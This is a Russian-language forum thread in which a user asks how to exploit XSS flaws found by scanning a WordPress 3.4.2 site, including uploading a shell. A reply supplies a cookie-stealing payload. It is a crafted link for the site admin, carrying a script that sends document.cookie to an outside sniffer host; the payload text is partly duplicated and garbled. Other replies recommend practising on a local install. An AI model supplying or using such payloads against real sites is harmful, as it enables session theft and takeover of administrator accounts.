XSS уязвимость ( WordPress )

Dosia

Dosia

Green Team
08.12.2016
96
27
Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )
 
Dosia сказал(а):
Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )
Нажмите, чтобы раскрыть...

ХSS подразумевает немного иное, используется для разнообразных атак на компьютеры пользователей с целью их захвата, кражи куки (например админа данного ресурса)
 
ghostphisher сказал(а):
ХSS подразумевает немного иное, используется для разнообразных атак на компьютеры пользователей с целью их захвата, кражи куки (например админа данного ресурса)
Нажмите, чтобы раскрыть...
Можно использовать что-то из этих уязвимостей для загрузки shell?
 

Вложения

  • Снимок экрана 2016-12-24 в 14.02.46.png
    Снимок экрана 2016-12-24 в 14.02.46.png
    351,6 КБ · Просмотры: 316
  • Снимок экрана 2016-12-24 в 14.03.10.png
    Снимок экрана 2016-12-24 в 14.03.10.png
    262,3 КБ · Просмотры: 475
Dosia сказал(а):
Можно использовать что-то из этих уязвимостей для загрузки shell?
Нажмите, чтобы раскрыть...

На мой взгляд - нет. Только попробовать провести xss на учетную запись админа

ПС К прочтению рекомендую - XSS атака, а так же поставить себе и поиздеваться на WP =) двиг очень популярный, но основыне ошибки идут в довесках к нему, иногда даже тема может быть уязвима.
 
  • Нравится
Реакции: Dosia
ghostphisher сказал(а):
На мой взгляд - нет. Только попробовать провести xss на учетную запись админа

ПС К прочтению рекомендую - XSS атака, а так же поставить себе и поиздеваться на WP =) двиг очень популярный, но основыне ошибки идут в довесках к нему, иногда даже тема может быть уязвима.
Нажмите, чтобы раскрыть...
А можно поподробнее о xss на админа? Или ссылку на тему )
 
Dosia сказал(а):
А можно поподробнее о xss на админа? Или ссылку на тему )
Нажмите, чтобы раскрыть...

Это значит, что будет сформированна специальная ссылка, которую надо будет дать админую.
Можно подлкючить сниффер куки ---> site.com/post.php?p='><script>img=new Image();img.src="
Ссылка скрыта от гостей
"+document.cookie;"+document.cookie;</script>

Почитать - тема очень обширная. Первым делом, следует проверить, а есть ли на ренсурсе та самая XSS (на себе в браузере). В вики есть статья
Ссылка скрыта от гостей

После прочтения уже будет более ясно, каким образом это использовать.

 
  • Нравится
Реакции: Dosia
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ